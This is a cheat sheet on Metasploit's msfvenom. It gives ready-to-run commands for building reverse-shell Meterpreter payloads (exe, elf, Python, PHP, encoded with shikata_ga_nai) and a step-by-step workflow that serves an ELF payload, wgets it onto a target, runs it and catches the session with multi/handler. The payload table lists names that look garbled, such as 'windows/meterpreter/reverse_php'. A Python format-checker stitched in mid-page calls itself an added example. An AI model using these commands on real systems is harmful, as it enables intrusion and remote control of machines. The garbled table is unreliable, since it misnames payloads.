# Msfvenom

## Introduction

Msfvenom is the standalone command-line utility within the Metasploit Framework used to generate and encode custom payloads.

## Basic usage syntax

```bash
msfvenom -p <payload> [options] -e <encoder> -i <iterations> -f <format> -o <output file>
```

{% hint style="info" %}

* `-p`: Specifies the payload to use.
* `[options]`: Payload-specific options such as `LHOST` and `LPORT`.
* `-e`: Specifies the encoder to use.
* `-i`: Specifies the number of encoding iterations.
* `-f`: Specifies the output format.
* `-o`: Specifies the output file.

{% endhint %}

## Commands

#### List all the msfvenom payloads

```bash
$ msfvenom -l payloads
```

#### List all the supported output formats

```bash
$ msfvenom -l formats
```

#### Generate a Reverse TCP Meterpreter payload for Windows

```bash
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
```

(This command generates a Windows executable file (`payload.exe`) containing a reverse TCP Meterpreter payload that connects back to the attacker's machine at `192.168.1.100` on port `4444`)

#### Generate an encoded payload

```bash
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f elf -o payload.elf
```

(This command generates a Linux ELF executable (`payload.elf`) containing a reverse TCP Meterpreter payload, encoded five times using the `x86/shikata_ga_nai` encoder)

#### Generate a python script for reverse shell

```bash
$ msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py
```

#### Generate a PHP code for reverse shell

```bash
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.php
```

(Note: You need to edit the generated `payload.php` file to turn it into a working PHP file by removing the comments and adding the closing tag)

## Multi Handler

It is an msf module used to listen for and receive the incoming connections.

To use it, open the msfconsole prompt with the `msfconsole` command, then follow this workflow:

```bash
msf6> use exploit/multi/handler
```

```bash
msf6> set payload php/meterpreter/reverse_php
```

(The payload should be the same as the one used earlier to generate the msfvenom payload)

```bash
msf6> set lhost 192.168.0.100
```

(The lhost value should be the IP address of your local machine)

```bash
msf6> set lport 4444
```

(Set an unused port; it must be the same port used in the msfvenom payload)

```bash
msf6> run
```

## Some payloads

<table><thead><tr><th width="332">Payload (-p)</th><th width="204">Format (-f)</th><th>Output file extension (-o)</th></tr></thead><tbody><tr><td>php/meterpreter/reverse_php</td><td>raw</td><td>.php</td></tr><tr><td>python/meterpreter/reverse_php</td><td>raw</td><td>.py</td></tr><tr><td>linux/x86/meterpreter/reverse_php</td><td>elf (Linux Executable and Linkable Format)</td><td>.elf</td></tr><tr><td>windows/meterpreter/reverse_php</td><td>exe</td><td>.exe</td></tr><tr><td>cmd/unix/reverse_python</td><td>raw</td><td>.py</td></tr><tr><td>windows/meterpreter/reverse_php</td><td>asp</td><td>.asp</td></tr><tr><td>php/meterpreter_reverse_php</td><td>raw</td><td>.php</td></tr></tbody></table>

Note: You can find the payload you need by piping the payload list through `grep` (for example `msfvenom -l payloads | grep php`)
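Because the table maps each `-f` format to a file extension, a quick way to catch a mismatched `-f`/`-o` pair (for instance PHP text saved with a `.py` name) is to compare the file's content against its extension. The following is an added example, not part of this page or of Metasploit; the byte signatures are standard file magic values and the sample inputs are constructed inline.

```python
import os
from typing import Tuple

# Extension -> content class the matching -f format from the table should produce.
EXPECTED = {".elf": "elf", ".exe": "exe", ".php": "php", ".py": "python", ".asp": "asp"}


def detect_format(data: bytes) -> str:
    """Classify a generated file by magic bytes or leading text; 'unknown' otherwise."""
    if data.startswith(b"\x7fELF"):          # ELF magic (-f elf)
        return "elf"
    if data.startswith(b"MZ"):               # PE/DOS header (-f exe)
        return "exe"
    head = data.lstrip()[:64].lower()
    if b"<?php" in head:                     # msfvenom PHP output opens with "/*<?php /**/"
        return "php"
    if head.startswith(b"<%"):               # classic ASP script tag (-f asp)
        return "asp"
    if (head.startswith(b"#!") and b"python" in head) or head.startswith(b"import "):
        return "python"                      # raw python payloads start with "import ..."
    return "unknown"


def check_output(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (ok, detail); ok is False when extension and content disagree."""
    ext = os.path.splitext(filename)[1].lower()
    expected = EXPECTED.get(ext)
    actual = detect_format(data)
    if expected is None:
        return False, f"{filename}: unknown extension {ext!r} (content looks like {actual})"
    if actual != expected:
        return False, f"{filename}: expected {expected} content, found {actual}"
    return True, f"{filename}: {actual} content matches extension"


if __name__ == "__main__":
    # Constructed samples: a minimal ELF header, a PE stub, and PHP text under a .py name.
    samples = {
        "payload.elf": b"\x7fELF\x02\x01\x01" + b"\x00" * 9,
        "payload.exe": b"MZ\x90\x00" + b"\x00" * 60,
        "payload.py": b"/*<?php /**/ error_reporting(0); /* constructed sample */ ?>",
    }
    for name, blob in samples.items():
        print(check_output(name, blob)[1])
```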

## Example

Here is an example showcasing the basic workflow (we already have access to the target machine and want to create a reverse shell):

1. First, connect to the target machine via `ssh`

```bash
$ ssh [username]@[target_ip]
```

2. After connecting to the target machine, create a payload for the reverse shell (on your local machine)

```bash
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[local_machine_ip] LPORT=[port] -f elf > rev_shell.elf
```

3. Then host it using Python's http.server module (on your local machine)

```bash
$ python3 -m http.server [port]
```

(Alternatively, you can use an Apache server on your local machine to host it)

4. Download the created reverse shell file onto the target machine (the file is hosted on the given port of your local machine)

```bash
$ wget http://[local_machine_ip]:[port]/rev_shell.elf
```

5. Listen for the connection on your local machine using Multi Handler

```bash
msf6> use exploit/multi/handler
msf6> set payload linux/x86/meterpreter/reverse_tcp
msf6> set lhost [local_machine_ip]
msf6> set lport [port]
msf6> run
```

6. Finally, run the .elf file on the target machine to create the meterpreter session

```bash
$ ./rev_shell.elf
```

(You may need to give the rev\_shell.elf file execute permission, e.g. `sudo chmod 777 rev_shell.elf`)

*Hence, you will have the meterpreter session on your local machine, which was listening for connections using Multi Handler.*
